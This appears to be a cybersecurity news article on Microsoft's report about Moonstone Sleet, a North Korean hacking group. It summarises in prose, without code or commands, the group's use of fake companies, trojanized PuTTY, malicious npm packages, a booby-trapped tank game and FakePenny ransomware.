Cyber security news for all

More

    Microsoft Unveils ‘Moonstone Sleet’ — New North Korean Hacker Collective

    An unprecedented North Korean menace, identified as Moonstone Sleet, has emerged, conducting cyber assaults on entities within the realms of software, information technology, education, and defense industries, employing ransomware and custom malware previously linked with the notorious Lazarus Group.

    According to a recent analysis by the Microsoft Threat Intelligence team, Moonstone Sleet operates by establishing fictitious enterprises and employment opportunities to engage potential targets, distributing trojanized versions of legitimate tools, fabricating a malevolent game, and deploying a fresh bespoke ransomware.

    The modus operandi of this adversary combines traditional methodologies employed by other North Korean groups with distinctive strategies to accomplish its strategic goals.

    Initially categorized by Redmond under the moniker Storm-1789, Moonstone Sleet is believed to be a state-backed entity that initially shared operational tactics with the Lazarus Group (also known as Diamond Sleet), before forging its own identity through separate infrastructure and techniques.

    The resemblance to Lazarus includes extensive reuse of code from known malware such as Comebacker, first detected in January 2021 targeting security researchers involved in vulnerability research.

    Comebacker, utilized by Lazarus as recently as February, was embedded within seemingly benign Python and npm packages to establish communication with a command-and-control server for additional payloads.

    In pursuit of diverse objectives, Moonstone Sleet is also known to seek employment in software development roles across multiple legitimate firms, likely aiming to generate illicit revenue for the country or infiltrate organizations clandestinely.

    Instances of attack observed in August 2023 involved a modified version of PuTTY, a tactic also employed by Lazarus in late 2022, disseminated via LinkedIn, Telegram, and developer freelancing platforms.

    Often, the actor would dispatch .ZIP archives containing trojanized putty.exe and url.txt files, prompting users to enter provided credentials into PuTTY, thereby decrypting an embedded payload for execution.

    The trojanized PuTTY executable drops a custom installer named SplitLoader, initiating a series of stages to launch a Trojan loader responsible for executing a payload from a C2 server.

    Alternative attack methods include malicious npm packages delivered through LinkedIn or freelancing platforms, masquerading as fake companies to distribute .ZIP files containing malicious npm packages under the guise of technical skill assessments.

    These packages are configured to connect to an actor-controlled IP address, dropping payloads similar to SplitLoader or facilitating credential theft from the Windows Local Security Authority Subsystem Service (LSASS) process.

    Notably, the targeting of npm developers using counterfeit packages has been associated with a campaign previously documented by Palo Alto Networks Unit 42, tracked by Microsoft under the name Storm-1877.

    Rogue npm packages have also served as a malware delivery mechanism for another North Korea-linked group dubbed Jade Sleet, implicated in the JumpCloud hack last year.

    Additional attacks since February 2024 have utilized a malicious tank game called DeTankWar, distributed via email or messaging platforms, along with the creation of fake websites and accounts on X (formerly Twitter) to lend legitimacy.

    Moonstone Sleet typically approaches targets through messaging platforms or email, presenting itself as a game developer seeking investment or collaboration, often masquerading as a legitimate blockchain entity or using fictitious companies.

    One such instance involved a fake company named C.C. Waterfall, presenting a blockchain-related project and offering collaboration opportunities, with a download link included in the email body.

    The game file (“delfi-tank-unity.exe”) contains a malware loader dubbed YouieLoad, capable of loading next-stage payloads in memory and creating malicious services for network and user discovery and browser data collection.

    Another non-existent company created by Moonstone Sleet for social engineering campaigns is StarGlow Ventures, masquerading as a legitimate software development entity to engage prospective targets for collaboration on various projects.

    While the conclusion of this campaign remains unclear, the inclusion of a tracking pixel in email messages suggests a trust-building exercise to gauge recipient engagement for future revenue generation opportunities.

    The latest addition to the adversary’s arsenal is a custom ransomware variant named FakePenny, deployed against an unnamed defense technology company in April 2024, demanding a $6.6 million ransom in Bitcoin.

    The use of ransomware mirrors tactics employed by Andariel (also known as Onyx Sleet), a sub-group of the Lazarus umbrella known for ransomware families like H0lyGh0st and Maui.

    In addition to fortifying defenses against Moonstone Sleet, Microsoft advises vigilance against supply chain attacks, given North Korean hacking groups’ proclivity for compromising the software supply chain for widespread malicious operations.

    Moonstone Sleet’s diverse tactics underscore its evolution from those of other North Korean threat actors over years of activity to achieve the country’s cyber objectives.

    This disclosure comes as South Korea accuses its northern counterpart, particularly the Lazarus Group, of pilfering 1,014 gigabytes of data from a court network between January 7, 2021, and February 9, 2023.

    Recent Articles

    Related Stories